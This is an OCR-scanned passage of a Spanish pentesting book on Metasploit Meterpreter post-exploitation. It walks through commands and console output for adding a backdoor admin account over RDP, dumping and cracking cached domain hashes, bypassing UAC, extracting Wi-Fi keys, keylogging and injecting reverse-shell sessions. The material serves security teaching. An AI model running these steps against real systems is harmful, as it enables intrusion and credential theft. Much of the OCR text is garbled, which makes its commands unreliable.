Existe  uii  script  denominado  retnoiewinenum  cuya  funcionalidad  es  identica  a  winenuni ,  peio  paia 
maquinas  remotas.  Se  debe  proporcionar  el  usuario,  la  contrasefva  y  ia  dtreccion  de  la  maquina 
objetivo.  Es  decir,  se  utiiiza  de  puente  la  maquina  vulnerada  para,  sabiendo  ias  eredenciales  de 
nil  usuario  de  otra  maquina,  recoger  informacibn  de  una  tercera  maquina  de  la  red.  Por  otro  lado, 
lambien  se  puede  ejecutar  este  script  sin  parametros,  lo  cual  hard  que  se  ejecule  eon  las  eredenciales 
o  icientidad  con  las  que  esta  corriendo  Meterpreier. 


Los  scripts  get 

EsLe  tipo  de  scripts  proporoionan,  general  men  te,  la  aetivacibn  o  habilitacion  de  tin  servicio,  como 
puede  ser  el  ease  del  escritorio  remoto  o  activar  telnet ,  y  la  recuperation  de  informacibn  sobre  el 
eniorno  y  las  eredenciales  de  cierlos  servicios  o  aplicaciones.  Este  tipo  de  script  ptieden  ser  de 
gran  ayuda  en  una  fase  de  post-explotacion  debido,  precisamente,  a  las  funcionalidades  comentadas 
anteriormenle. 


A  continuation  se  muestra  un  listado  de  les  scripts  cuyas  funcionalidades  son  las  de  recoleccibn  de 
eredenciales  e  informacibn  del  entorno  vulnerado: 

I  Seriot  Descripeion  | 


Devuelve  un  listado  con  ias  aplicaciones  inslaladas  en  la  maquina 
geijipplicationjinl  v|t(Berada_ 


getjmv 


get JileziUa_crecls 


Devuelve  el  listado  de  las  variables  de  entorno  de  la  maquina  vulnerada. 

Obtiene  ias  eredenciales  almacenadas  por  Filezilla  si  la  aplicacibn  se 
encuentra  instaiadaen  el  sistema  vulnerado. 


Devuelve  un  listado  de  las  subredes  en  las  que  se  encuentra  la  maquina 

getjocaljiubnets 


Obtiene  ias  eredenciales  almacenadas  por  Pidgin  si  la  aplicacibn  se 
encuentra  instalada  en  el  sistema  vulnerado. _ 

Obtiene  eredenciales  de  VNC,  recuperandoias  del  registro  de  Windows. 


get _pidgin_creds 


getjmcpw 


Tabla  4.02:  Listado  de  scripts  get  para  reeoleccidn  de  eredenciales  e  inlbrmacion  del  entorno. 


Los  scripts  gelcountermeasure,  gettelnet  y  getgui  aportan  unas  funcionalidades  muy  inleresantes  en 
la  fase  de  post-explotacion. 

El  script  getcountermeasure  proporciona  informacibn  sobre  la  configuration  del  firewall  en  la 
maquina  vulnerada.  Ademas,  da  informacibn  de  ia  poiitica  que  dispone  la  maquina  vlctima  sobie 
DEP,  Data  Execution  Prevention. 


Ei  script  gettelnet  permite  al  atacante  habilitar  el  servicio  de  Telnet  en  el  puerto  23.  Existen  distintas 
opciones,  como  son  la  posibilidad  de  habilitar  solo  el  servicio.  En  este  caso  to  normal  serta  conocer 
un  usuario  y  una  contrasena  para  poder  conectarse  con  una  aplicacibn  de  Telnet ,  por  ejempio  Putty. 


MetaspSoit  para  Pent  esters 


usuario,  el  euai  etf  .lisponible  en  la 

fete  y  se  habilita ,,  poaibS*  ^ ZT“?  *  *"  u"“rio  * h  A 

*  pod*  gestionar  graficamente  dicho  sis'iema  ha^iend  Tcho  SSo  L'/f^  '*?' 
tgie  tener  ea  ciienta  que  esta  accion  puede  dejar  mas  iHieilas^ie  e!9^d^^^ 

pnrfmetros  dispone  el  tc ripieeimi  Diflm’  a  aa<h,or  **  c0ll0cer  0  recordilr  *>  mid 

servicio,  -u  para  erear  im  ^sirado'y  -p  pm  isicnaHp0"6  ^  °S  pari’me,ros  _e  fmT8  sd*°  habilitar  el 
al  script getietnei.  *  P  P  ‘  8  Ulla  contrasei1a- el  timcionainiemo  es  similai 

iin  primer  litgar  se  habilita  el  servicio  de  escritorir  rpimta 

hackee/ con  su  respective  contrasefia  como  se^u^e^sttaiizm^eiTMma^en  Un  llSUar'°  denom*nado 


il&t'rfiier  >  run  gUyuT'-u  linked  -p  I23abc.  -e - - - ■ - 

;  S? ***  *  aarkoperator 
*)  Enabling  Remote  Desktop 
j  +  j  RDP  .is  disabled;  enabling  it  ... 

-J  Setting  Terminal  Services  service  startup  mode 

|:j taSS "2SA": ££  — ■  *** « - -  I 

M  Setting  user  account  for  logon  y 

ii!i - ^er:  hacked  with  Password;  I23ahr . 

Fig  4.  i  7:  Habilitar  servicio  de  eseritorio  remote  con  getgui. 

Tm  1 sislcma- Es 

maq  u  in  a.  Se  proccde  a  abrir  una  shell  o  lfn™  f.P  p  al  «T,1F° c!e  administradores  de  la 


feerpreteFl.  shell  “ — - - — — - . 

Process  1124  created. 

Channel  G  created.  j 

Microsoft  Windows  XP  [Version  5.1. 26C0 J 
(C)  Copyright  1985-2061  Microsoft  Corp. 

jnet  locatgroup  administVadorerhackef/LT'^0^5  h3Cked  /add 
ha  comP^et3do  el  comando  correctamente. 


Pig  4- 1 8:  Adiciin  del  usmrk,  hacked  al  grapo  de  admin  isiradores. 


Capitulo  IV.  Meterpreter  &  Post-Explotation 


Ufia  vez  que  se  dispone  de  un  usuario  perteneciente  al  grupo  de  admitiistradores  se  ptiede  utilizar  la 
herramienta  rdesktop  disponible  en BackTrack  para  reaiizar  la  eonexion.  La  instruccion  a  ejecutar 
ia  sign  iente  rdesktop  -it  hacked  -p  J23abc.  <DireccidnIP>. 


ftav  Internet 
Sap  Intentek  Expfotftt 


F]  Uurren  etuciidnico 
U  Outlaw  E>m*> 


jl  Reptoduckor  de  Windows 


„  !  isrccw 

mbhwbwI 

,  little*-.  T^k-s": 

j  nsister^e  para  transference  .  «&5  $wt 

(  deai chfvos  y  conftguraclo.. 


_ _ 

TEdiMlMproyama*  & 


Fig  4. 1 9:  Cor.exion  mediante  eseritorio  remoto  a  la  maquina  vulnerada. 

For  ultimo  y  una  vez  reaiizada  la  accion  que  se  requiera  mediante  el  uso  del  eseritorio  remoto,  se 
va  a  proceder  a  la  eliminacioii  automatica  del  usuario  y  a  la  desactivacion  del  servicio  de  eseritorio 
remoto.  De  este  mode,  se  evita  levantar  sospechas  y  se  deja  el  sistema  en  ei  estado  en  el  que  se 
encontraba  desde  un  principio. 

Cuando  se  habilito  el  servicio  de  eseritorio  remoto  a  traves  del  script  getgui,  se  creo  aiitoniaticamente 
un  script  de  automafizacion  en  la  ruta  /root/ msf 4 /logs/script/getguU 'clean  up __<Jecha> .rc  eon  el 
que  se  automatiza  !a  accion  de  deshabilitar  el  servicio  y  la  eliminacion  del  usuario. 

meterpreter  >  resource  /root/ . msf 4/logs/scripts/getgui/cleanjjp_20120829. 4896. rc 
(*]  Reading  /root/. msf4/logs/scripts/getgui/clean_up__2S120829. 4806. rc 

1*1  Running  reg  setval  -k  'HKLM\Systeni\CurrsntControlSet\Control\Terminal  Server'  -v  'fDenyTSCon 
nections’  -d  "1" 

Successful  set  TDenyTSConnections. 

1*1  Running  execute  -H  -f  cmd.exe  -a  B/c  sc  config  temservice  start®  disabled" 

Process  3676  created. 

l+J  Running  execute  -H  -f  cmd.exe  -a  "/c  sc  stop  termservice" 

Process  3696  created. 

I  +  )  Running  execute  -H  -f  cmd.exe  -a  "/c  ’nets!)  firewall  set  service  type  »  remotedesktop  mode  «: 


Process  3716  created, 
meterpreter  > _ 


Fig  4.20:  Proceso  automalizado  para  eliminacion  y  desactivacion  del  servicio  R.DP. 


- — - — _ _  Metasploit  para  Pent-esters 

Los  scripts  post 

bn  primer  lugar  se  tmtamn  los  scripts  multi,  ios  cuales  pueden  ser  organizados  en  tres  tipos: 

•  ,  ^ste  bpo  de  scripts  sirven  para  recofectar  information  de  aplicutiones  del 

Cma' c,e}  entorno>  de  la  red,  de  credenciales  de  aplicaciones,  etcetera. 

Manage.  Este  tipo  de  scripts  permite  gestionar  otros  scripts. 

Genet  al.  Peimiten  realizar  accioiies  de  ejecucion  y  cierre  de  tareas  en  Meterpreter. 

Wireless  Scripts 

MmbricM  funclonalifatles.l'dacio'radas  con  la  lematica  Wireless  o  redes 

.  ,  I  .  ■  t  es  os  es  extraer  d  mixinjo  de  informacidn  de  los  perfiles  Wireless  oue 

obliene  |a  “  la  m4cluifla  vulnerada-  En  sistenias  Windows  7  o  Windows  Vista  se 

obbene  la  contrasena  para  redes  WPA,  Dried™  que  en  Windows  XP  se  obliene  la  Have  PB^fI 

hsTeZ0'0"3/'  algUn0S'  el  ^‘P'P^^dows/wlan/wlanJssJst  proportions  informacidn  sobre 

Recon  Scripts 


Capitulo  IV  Meterpreter  &  Post-Explotcition 


Manage  Scripts 

Este  tipo  de  scripts  permite  realizar  acciones  de  gestion  sobre  la  maquina  vulnerada.  La  lista  de 
acetones  es  anvplia  y  variada,  por  ello,  se  enumeran  las  mas  interesantes  en  la  siguiente  lista: 

-  Gestion  de  usuarios.  Los  scripts  post/windows/manage/deleiejiser  o  post/windows/ 
manage/addjiser domain  peimiten  realizar  acciones  sobre  los  usuarios  de  tin  doniinio, 
grupo  de  dominios  o  maquina  local. 

-  Gestion  de  elementos  de  red.  La  manipulation  de  certificados  se  realiza  mediante  el 
uso  de  los  scripts  post/windows/manage/injeetjea  o  post/windows/manage/remo vc_ca,  y  ia 
manipulacion  de  hosts  mediante post/windows/manage/injecijwst  o post/windows/manage/ 
remove  host.  El  eomando  automate  tambien  se  encuentra  presente  mediante  el  script  post/ 
windows/manage/autoroute  y  la  habilitacidn  del  escritorio  remoto  se  puede  hacer  con  el 
scri  p  t  posl/windo  ws/manage/ enable jrlp . 

-  Gestion  de  procesos  y  payloads .  Con  este  tipo  de  scripts  se  puede  comparin'  la  maquina 
vulnerada  con  otro  equipo  mediante  la  inyeccidn  de  un  nuevo  payload  a  traves  de  la  ejecucion 
de  post/windows/manage/payloacljnject  LHOST=<direccidn  IP  maquina  nuevo  equipo>. 
Logicamente,  el  nuevo  equipo  debera  tener  montado  el  handler  exploit/multi/handler  para 
recibir  la  sesion.  El  eomando  migrate  tambien  dispone  de  un  script  con  post/windows/ 
manage/migrate. 

-  Ejecucion  de  un  script  de  Microsoft  Windows  PowerShell.  Esta  posibilidad  data  de 
flexibitidad  y  potencia  a  Metasploit.  En  una  sesion  de  Meterpreter  se  puede  ejecutar  un  script 
de  PowerShell  gracias  al  script post/windows/manage/powershell/exec  jwwershell. 


Es  recomendable  visualizar  el  listado  de  los  scripts  de  gestion  ya  que  aportan  gran  flexibilidad 
y  potencia  a  la  sesion  de  Meterpreter.  A  continuation  se  puede  visualizar  el  listado  de  scripts 
disponibles. 


meterpreter  >  run  post/windows/manage/ 

run  post/windows/tnanage/add_user_domain 

run  post/windows/manage/autoroute 

run  post/windows/manage/deleteuser 

run  post/windows/manage/downloadexec 

run  post/windows/manage/enahlerdp 

run  post/windows/manage/injectca 

run  post/windows/manage/ in j  ect  host 

run  past/windows/manage/migrate 

run  pos  t/windows/manage/mul  t  i  mete  rp  reter  in j  ect 

run  post/windows/manage/nbd_sIrver 

run  post/windows/manage/paytoad  inject 


irun  post/windows/manage/persistence 

[run  post/windows/manage/powersheU/execpowersheU 

irun  post/windows/manage/pxexploit 

Irun  post/windows/manage/ removeca 

run  post/windows/manage/ removehost 

run  post/windows/manage/ rtinas 

run  post/windows/manage/vssc reate 

run  post/windows/manage/vss_lisl 

run  post/windows/manage/vssmount 

run  post/windows/manage/vss_set_storage 

run  post/windows/manage/vss_storage _ 


Fig  4.2 1 :  Lista  de  scripts  de  gestion  de  post/windows/manage. 


Gather  Scripts 

Los  scripts  de  tipo  gather  proporcionan  funcionalidad  para  recolectar  y  contprobar  todo  tipo  de 
informacidn  en  ia  maquina  vulnerada.  Son  los  scripts  que  mas  abundan  en  Meterpreter  y  pueden 
ayudar  y  mucho  a  conocer  el  eslado  de  la  maquina,  del  entorno  y  obtener  el  maximo  de  informacidn, 
lanto  confidential  como  reievante,  de  dicha  maquina. 


Metasploit  para  Pen  testers 


se  pueden  organic  per  tematte  o  objerivos,  los  cuales  se  enumemn  a  continuacto 

•  Credenciales.  Los  scripts  post/wIndows/gather/credoHch  son  capaces  de  recoeer  las 

ST^r  "  dC  aPHCaCi0ReS  ° SerViCi0S  **  "  P~  «  la 

use  l>osi/wiiuluws/gather/credentials/enoBi  cred  stnn>  1!  ? “s^wlnfW5^9ather/crcden1ials/niiiibuz2 
««;  pnst/wiiulows/gather/credentiols/enum'plcasa  owds  ««  ^es,t^^ows/9at!!er/crS'le'itials/oi/tlook 

use  post/wlndows/gather/credentials/epo  Sql  ttllZi' 

use  I'Qst/wiiidows/gather/credentials/filezilla  server  til  ^^Mndows/gather/creclenrials/SMrtftp 

use  post/wiiidows/gather/credentials/flashfxo  "  tit  Ef  - ”fWS' 9at,18r/credentials/tortoisesvn 

use  post/windows/gallier/credentials/ftpnavlgator  !f  P^J/w^dows/gather/credentlals/total  cower 

use  [josl:/wi.iidows/gaLlier/credentials/gpp  9  PostMndows/gather/credentials/trmian 

use  post/wlmlows/gather/credentials/idln  post/wtndows/gather/credentials/vnc 

use  post/wjr.dows/ijather/credentials/l.naii  til  P°stMndows/gather/credentials/windows  autologin 

use  post/wxitdows/gattier/crertpni  iarc/i..v.t  “f  P°st/windows/gather/credenlial5/winscD  ' 

~  ~~ - - - - - — - —  |use  PostMndows/gather/credeniials/wsftn  client 

6  ~2:  L,Stad°  *****  P0,’a  rec°!ecci6n  de  credenciales  en  la  matprina  v'utnemda.  - 


=:  d  r  r*  -  *• 

r~  ■>  —«  i. 


pos  t /windows /ga the r/ emim  applications - 

post/windows/gather/enum"artifacts 
post/windows/gather/Rmmfciirome 
ipost/windows/gather/enum  comouters 
!pcst/windows/gather/enunf  devices 
post/wiiufows/gather/enum  dirpenns 
post/windows/gather/enum  domain 
post/windows/gather/enuiB~doinain  grout)  users 
pust/wiiid(iws/gather/em«B~doii)ain  tokens 
post/windews/gather/enum  domains 
post/windows/gather/enum  files 


post/windows/gather/enum  liostfile 
post/windows/gather/enum~ie 
post/windows/gather/enum  logned  on  users 
post/windows/gather/enum  msDroduct  keys 

post/windows/gather/entmjpowersheirenv 
post/windows/gather/enum  service* 
post/windows/gather/enum~shares 
post/windows/gather/emjnfsnmp  I 

post/windows/gather/ enum_lermserv 
post/windows/gather/enum  tokens 
post/windows/gather/enunTtinattend 


Fig  4.23:  Listado  de  scripts  para  emrmerar  recursos  y  propiedadcs. 


)C  discos  remotos  o  voiumenes.  Ei  script  post/windowshather/forensil 

VNC  qin  rnnimior  u  '  '  •  , * ’  P  reaI,zar  espionaje  de  pantalla  es  mejor  utiiizar 

■a  ™quina  ™tima’  ■**"»*  p-  ,0 
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PoC:  Obteniendo  hashes  de  usuarios  de  dominio 

En  esta  breve  prneba  de  concepto  se  presenta  el  siguiente  escenario: 

-  El  auditor  ha  vulnerado  una  maquina,  aparentemente  no  es  iina  maquina  de  dominio.  Pero 

al  ejecutar  ei  script post/windows/gaiher/cachedump  este  observara  que  hay  credenciales  tie 
usuarios  de  un  dominio.  \ 

-  La  maquina  vu Inerada  es  Windows  XP  SP3  y  el  auditor  util iza  BackTrack  5. 

El  punto  de  partida  es  ia  sesion  de  Meterpreter,  al  lanzar  el  script post/windows/gathcr/cachedump 
se  obtendra  un  listado  de  usuarios  y  hashes  de  dominio,  entre  ellos  el  administrador  del  dominio. 
/Como  es  esto  pnsible?  Los  sistemas  operativos  Windows  aimacenan  por  defecto,  es  decir  por 
politics,  los  ultimos  1 0  usuarios  que  ban  iniciado  sesion  en  el  dominio  correctamente.  Para  sistemas 
operativos  Windows XP/2003  los  hashes  se  aimacenan  en  formate  MSCashl  y  puede  ser  crackeado 
tie  manera  r&pida,  con  velocidades  de  miles  c!e  hashes  por  segundo.  En  sistemas  operativos  Winodws ! 
Vista/2008  y  superiorcs  se  aimacenan  en  un  formate  mucho  mas  seguro  como  es  MSCashl,  el  cual 
hace  que  se  logren  velocidades  10  veces  inferiores  a  la  anterior  version  del  algoritmo. 

laeterpreter  >  run  pos t/windows/gat he r/cachedump 
1*3  Executing  module  against  PmJEBAS-ei760CC 

{*1  Cached  Credentials  Setting:  10  -  (Max  is  59  and  0  disables,  and  10  is  default) 

[*]  Obtaining  boot  key... 

I*]  Obtaining  Isa  key... 

!*]  XP  compatible  client 
[»]  Obtaining  LK$KM... 

{*)  Dumping  cached  credentials... 
f*3  John  the  Ripper  format: 

flu:83f08afblf3fe6d6egi608aflBf8f692:HETASPLOIT.LOCALf:METASPLOiTg|] 
administration 74e8d8c50bb4ab35bb7d5edd408c8649:HETA5PLOIT.LOCALA:METASPLOIT 
{*1  Hash  are  in  MSCACBE  format,  (aiscash) 

Fig  4,24:  Obteneion  de  hashes  de  dominio  para  su  posterior  cracking. 

Una  vez  conseguidos  los  hashes  se  pueden  crackear  con  la  ayuda  de  las  aplicaciones  Cain  o  John 
.  The  Ripper.  Otro  opcion  a  estudiar  es  la  posibilidad  de  utiiizar  una  GPU  para  agilizar,  y  mucho,  el 
proceso  tie  fuerza  brute, 

rootgbt :  /pentes  l/passv/ords/john#  ./John  -  -wordlist :  /root/diccions  rio .  txt  --format  inis  cash  /root/w 
ee.txt  /w 

loaded  2  password  hashes  witli  2  different  salts  (H$  Cache  Hash  [Generic  lx]) 

123abc.  (odisinistrador) 

123abc.  (flu) 

guesses :  2  time:  0:00:99:00  100.00%  (ETA:  Fri  Aug  31  15:56:51  2012)  c/s:  1000  tryino-  m  k 

Iaiiaaa. _ _ _ _ _ _ _ _ 

Fig  4.25:  Cracking  de  hashes  MSCashvt  con  John  The  Kipper. 


Escalate  Scripts 

Este  tipo  de  scripts  son  a  la  vez  mini  exploits  ya  que  se  encargan  de  intentar  eievar  privilegios  en  la 
maquina  vutnerada.  El  exito  de  la  ejecucion  de  estos  scripts  clependera  del  sisterna  operative  donde 
se  ejecuten. 


riMiH  _ ___ _  ' _ Melos p  toil  para  Pen  testers 

Uno  de  los  mas  famosos  para  sistemas  Windows  XP  es  post/windows/escalate/ge tsystem.  El  script 
post/windows/escalate/bypassuac  permite  elevar  privilegios  en  sistemas  Windows  7  o  Windows 
Vista,  y  de  este  modo  Jlegar  a  ser  el  usuario  System. 

FoC:  Bypass  a  UAC  en  Windows  7  con  obtencion  de  infonuacidii  WLAN 
En  esta  prueba  de  concept©  se  presenta  un  escenario  en  el  que  el  auditor  ha  explotado  una 
v u  1  nerab i  I i dad  en  un  sistema  com©  Windows  7,  Windows  Vista,  o  Windows  Server  20Q8/R2,  en  este 
caso  se  hard  referenda  siempre  a  Windows  7. 

bl  auditor  dispone  de  una  sesion  de  Meterpreter  con  un  usuario  estandar  sin  privilegios.  El  ohjefjvo 
es  elevar  privilegios  llegando  a  ser  usuario  System  y  obtener  informaeibn  sabre  las  redes  wireless 
que  tienc  configurado  y  utilizar  as!  la  maquina  vulnerada.  Adernas,  de.  encontrar  informaeibn  util 
sobre  eontraseilas  de  las  redes  wireless,  lo  cual  puede  aportar  una  nueva  via  de  investigacion  en  ei 
test  de  intrusion. 


payload  =»  windows/meterpreter/ reverse  tcp 
Ihost  =>  192.168.1.49 
Iport  ->  4444 

1*1  Started  reverse  handler  on  192.168.1.40:4444 
1*1  Starting  the  payload  handler. . . 

1*1  Sending  stage  (752128  bytes}  to  192.168.1.42 

[*]  Interpreter  session  1  opened  (192.168.1.49:4444  ->  192.168. 1.42:1079)  at  2812-08-31  02-14-08 
+0209  ‘  ‘  ' 

leterpreter  >  getuid 

Server  username:  hit-pnoablo _ 

Fig  4.26:  Obtencion  de  la  cohsola  de.  Meterpreler. 

exploit (handler)  >  sessions  -i  1 
1*1  Starting  interaction  with  l... 

ineteroreter  >  getsystem 

AC{-J  Error  running  command  getsystem:  Interrupt 

meterpreter  >  getuid 

Server  username:  hit-PC\pablo 

meterpreter  >  getsystem 

H  priv  elevate  getsystem;  Operation  failed:  Access  is  denied . 

Fig  4.27:  Intenlo  de  elevacion  de  privilegios  sin  exito. 

La  primera  accion  que  se  intentara  es  utilizar  el  script  de  tipo  elevate  para  realizar  un  bypass  a  UAC. 
Tias  lanzar  el  script  post/windows/ escalate/bypassuac  se  obtiene  una  nueva  sesion  de  Meterpreter, 
con  identificador  distinto  logicamente.  Si  se  ejecuta  el  comando  sessions  -/  en  msfconsole  se  puede 
visuaiizai  que,  aparentemente,  se  dispone  de  una  nueva  sesion  de  Meterpreter  con  el  mismo  usuario 
que  en  la  sesion  previa. 

Realmente  esto  no  es  cierto,  ya  que  cuando  se  interactue  con  la  nueva  sesion  de  Meterpreler  y  se 
ejecuie  la  instruccibn  getsystem,  se  obtendra  exito  en  ei  jntento  de  elevacion  de  privilegioStcn  la 
maquina  vulnerada. 


[*)  Started  reverse  handler  on  192.168.1.40:4444 
[*}  starting  the  payload  handler... 

(*]  Uploading  the  bypass  UAC  executable  to  the  filesystem... 

(■*]  Meterpreter  stager  executable  73802  bytes  long  being  uploaded.. 

(* j  Uploaded  the  agent  to  the  filesystem. ... 
meterpreter  > 

( * 3  Sending  stage  (752128  bytes)  to  192.188^1,42 

{♦]  Meterpreter  session  2  opened  ( 192 . 168 .1,40: 4444  ->  192.168.1.42:1986)  at  2812-08-31  82:21:33 
+S298 

(*}  Session  ID  2  (192.168.1.46:4444  ->  192.168.1.42:1086)  processing  IruVialAutoRunScript  ’nugra 
te  -f 

(*]  current  server  process:  mFzd2dwLsDqgv.exe  (4248) 

(*]  Spawning  notepad, exe  process  to  migrate  to 
' - 1  Migrating  to  3996 
M  Successfully  migrated  to  process 

meterpreter  >  background 

1*1  Backgrounding  session  1... 

rasf  exploit (handler)  >  sessions  -l 

Active  sessions 


Id  Type  Information  Connection 

1  meterpreter  X86/win32  bit-PC\pablo  @  BIT-PC  192.168.1.40:4444  ->  192.168.1.42:1079  {192. 

168.1.42) 

2  meterpreter  x86/win32  bit-PC\pablo  @  BIT-PC  192.168.1.40:4444  ->  192.168.1.42:1086,  (192. 

168.1.42) _ _ _ — _ _ 

Fig  4.28:  Ejecucion  del  script  posi/wmdows/escataleJbypassuuc. 

{jjjtgrpreter  >  getsystem 

...got  system  (via  technique  1). 

meterpreter  >  getuid 

Server  username:  NT  AUTHORITY\SYSTEM 

meteinreter  >  shell 

Process  5352  created. 

Channel  1  created. 

Microsoft  Windows  [Version  6.1.7691] 

Copyright  (c)  2B09  Microsoft  Corporation.  Reservados  todos  los  derechos. 

C :  \V/indows\system32>whoami 
whoami 

nt  authority\system 

C :  \windows\syste«i32>i _ _____ _ 

Fig  4-29:  Elevacion  de  privilegios  con  exito  en  Windows  7. 

En  este  punlo  el  auditor  dispone  de  un  usuario  System  con  el  que  puede  realizar  cualquier  tipo  de 
accion  sin  restriccion  en  la  maquina  vulnerada. 

Para  realizar  la  recogida  de  informaeibn  de  las  redes  wireless  almacenadas  en  la  maquina  Windows 
7  se  ejecutan  los  scripts  de  tipo  wireless,  los  eiiales  han  sido  explicados  anteriormente.  La  primera 


— - - — - — — - -  -  Me  fas  pi ait  para  Pen  testers 

a Imaceiiacl^i 'es^Le  (T s igni fJca* e  ^  ^  *?*  que  ia  "M™  (ieiie 

lia  conectado  n  dichas  redes.  Q  ’  g  ‘  1  *  651  al gun  momento  ,a  niaquina  vuinerada  se 


j.OigtBrjiretgr  >  run  post/windows/wlan/wlaR _bss_U$t  . . 

ppwlanasslj St ”=>3359544] 


[*3  t  jetLastError”«>0,  " return "=*>0 
1*3  Number  of  Networks;  18 
'  !  SSID :  WlANAA 

BSSID:  e0:02;cf;ce:c6:la 
Type;  Infrastructure 
?HY:  Extended  rate  PHY  type 
RSSI:  -39  ” 

Signal:  99 

SSID;  JAZZTEL2011 

BSSID:  00Tla;2b:6S:efc:75 
Type;  Infrastructure 
f’HY;  Extended  rate  PHY  tv»e 
RSSI;  -85 
Signal:  25 

J1  SSID:  WiFi8D17B3 

BSSID;  8B:25;2c:b8:dl:l)0 
Type:  Infrastructure 
PHY:  802. iln  PHY  type 
RSSI:  -80 
Signal:  33 


Fis  4.30:  OWwoM. del  lialMo  *  redes  * „„„  ,nd<|(lin„ 

r  r 

conlrasenas  para  eonectawe  a  *■«,.  lwu  n  ,  .  *“■  J"nue  a,c!ul  mlojrnacion  estan  fas 

parte  (, onde.se  encwentra  information  sensible  c^nollar^ntraseflaTel^iiiljre^tj  ^ 


</WLANPrcfile?  - - - - - - - - — . 

Profile  Name:  WLAfJ  AA  * 
j<?xffil  version-”!. 0-'7> 

-V/LANProf  i  le  x(fllns=“http :  //wwvz.  micros  oft .  comynetwerkinn  /wi  •  i  , 

<name>WLAN  AA</na,ue>  -™i/iu:TworKing/WLAN/prof.ile/vr 

<SSICConfig> 

<SSID> 

<hex>574C4:  114Whex> 

<name>WLAN  ,</name> 

</SSID> 

</SSIDConfig> 


<eonnecttonType>ESS«/connectionType* 

<;Mc!!lneCt:io,’Motle>aut,,</'ccnnectionMode> 

<nSM> 


<security> 

outhEncryption> 

<authentication>0pen</authenticatian> 
.  <encryption>WEP</encryption> 

■ — - - —  <useoneX>false</useOnex> 

h  18  4-3 1 :  Volcm,°  de  informacj^n  sensible  de  redes  wireless. 


J 
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e!  comando  rietsh  wkm  show  profile  para  recuperar  la  informacidn  de  las  redes  wireless  configurada 
en  la  maquina  vuinerada.  Sc  recomienda  redirigir  esa  salida  a  un  archivo  y  mediante  el  uso  del* 
comando  download  obiener  dicho  archivo.  Tambien  se  piiede  ejecutar  la  instruccibn  neish  wlam 
export  profile  folder^.  key-clear,  con  la  cual  se  hace  tin  volcado  de  ios  perfiles  wireless  a  ficheros 
XML  en  la  rut  a  especiftcada  en  ei  parametro  folder.  La  contraseha  se  devuelve  en  texto  piano.',  ’ 

Capture  Scripts 

Este  tipo  de  scripts  proporcionan  funcionalidades  para  realizar  captures  de  las  pulsaciones  de  teclado 
En  olras  palabras,  se  activa  un  keylogger  en  la  maquina  vuinerada.  Como  ejemplo  se  presentan  los 
scripts  post/windows/capture/keylog recorder  y  post/windows/capture/lockout Jceylogger. 


Los  multi  scripts 

Estos  scripts  son  utiles  para  realizar  varias  operaciones  a  la  vez.  Comunmente,  se  pueden  encontrai 
los  siguientes: 

-  Multicommand.  Este  script  permite  al  usuario  poder  lanzar  distintos  comandos  poi 
ejemplo  dc  Windows,  en  una  sola  instruction.  Ademas.  se  puede  almacenar  (a  salida  de 
cad  a  comando  en  un  fichero  para  su  posterior  analisis.  Permite  ejecutar  tambien  ios  ficheros 
de  automatization  RC,  lo  cual  oyuda  a  simplificar  la  ejecucidn  de  aeckmes  realizadas  con 
anterioridad.  Un  ejemplo  de  ejecucion  de  est e  script  serla  run  multicommand  -cl  “cmd 
/c  dir",  “ipconftg”,  ”<mds  comandos>”.  No  debe  existir  separation  entre  Ios  comandos 
y  las  comas,  ya  que  el  script  se  encarga  de  parsearlo.  Es  posible  almacenar  la  salida  de 
la  ejecucion  en  un  fichero  mediante  el  parametro  -f,  un  ejemplo  seria  multicommand  *- 
cl  "<comandol>  ”,  ”<comandoN’’>  -f  <fichero  local> .  Dicho  fichero  se  descargana 
automnticinneiite  por  Meterpreter  a  la  maquina  del  auditor. 

-  Multi jxvisole_command.  Este  script  es  similar  al  anterior,  multicommand.  La-  unica 
diferencia  es  que  no  dispone  de  la  option  de  almacenar  en  un  fichero  la  salida  los  comandos 
que  se  eject! tan  en  la  maquina  vuinerada.  Por  esta  razon,  esta  considerado  una  version  antigua 
de  multicommand. 

-  Multi  meter Jnjeet.  Este  script  es  realmente  interesante  ya  que  permite  inyectar 
Meterpreters  en  otros  procesos  de  la  maquina  vuinerada,  y  conftgurando  ademas  donde , 
deben  conectarse  si  la  conexion  es  inversa.  En  la  siguiente  tabla  se  pueden  visualizar  los 
distintos  pararnetros  de  este  script. 


Parametro 

Descripcion 

-in 

Este  parametro  arranca  el  modulo  exploit/multi/handler  para  la  conexion  inversa. 

-mp 

Proporciona  multiples  PID  para  la  inyeccion  de  Meterpreter,  los  PIDs  deben  ir 
separados  por  comas.  ■  ,s  V 

-mr 

Proporciona  multiples  direcciones  IP  las  cuales  esperaiin  la  conexion  trtvjBjrsa;. 
Dichas  direcciones  IP  deben  ir  separadas  por  comas.  v  V  •  > 
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Panimetro  Description 

’P  Se  especilicaeT  puerto  donde  estan  a  la  escuclm  los  handler. - 

“P*  bsPeciI,ca  el  Meterpreter,  que  por  cBecto  es  mncknmmlerpmer/ reverse. Jcp7 


Tablsi  4.03:  Paramelras  del  script  multi  meter  inject. 

EteriKeter  >  run  multijaeter  ifiject  -gip  668  -ar  132, 16a.  1.48, l^TslTirT-'p' 55^5  1 
Creating  a  reverse  interpreter  stager:  UfflST-l«.  168. 1.48  U>0RT*5555 
■  Starting  Notepad.exe  to  house  Meterpreter  Session. 

•  > :  Process  created  with  pid  268 

Injecting  meterpreter  into  process  ID  268 
[’J  Allocated  memory  at  address  8x68936886,  for  290  bvte  staoer 
Writing  the  stager  into  memory... 

Success  fully  injected  Heterpreter  in  to  process:  2fifl _ 

i'ig 4.32:  Ejccucion  de  multi jneter^inject. 

Tras  lanzar  el  script ,  si  otto  usuario  o  maquina  se  encontrase  eon  un  handler  aclivo  preparado 
para  reetbu*  sesiones  de  Meterpreter  se  podrla  recoger  tal  y  como  se  observa  en  la  imagen. 

payload  windows/meterpreter/  reverse  ten  - 

Ihost  =>  192.168.1.46 
Iport  =>  5555 

1*1  Started  reverse  handler  on  192. 16B. 1.48:5555 
f*l  Starting  the  payload  handler... 

■1*1  Sending  stage  {752128  bytes)  to  192.168.1.35 

I;^ter7r  SeSSi0"  1  °pened  {192.168.1.48:5555  ->  192.168.1.35:1103)  at  2012-08-31  06:26:38 

Fig  4.33:  Obtencion  de  sesion  de  Meterpreier  mediante  la  utilizacidn  de  multi jneter  inject. 

Multiscript.  Este  script  permite  ejecular  distintos  scripts  en  una  sola  instruccion.  La 
sintaxis  es  identica  a  los  anteriores. 


4.  Modulos  de  Meterpreter 

Meterpreier  dispone  de  modulos  extra  que  no  se  eneuentran  cargados  ai  reaiizar  la  explotacion. 
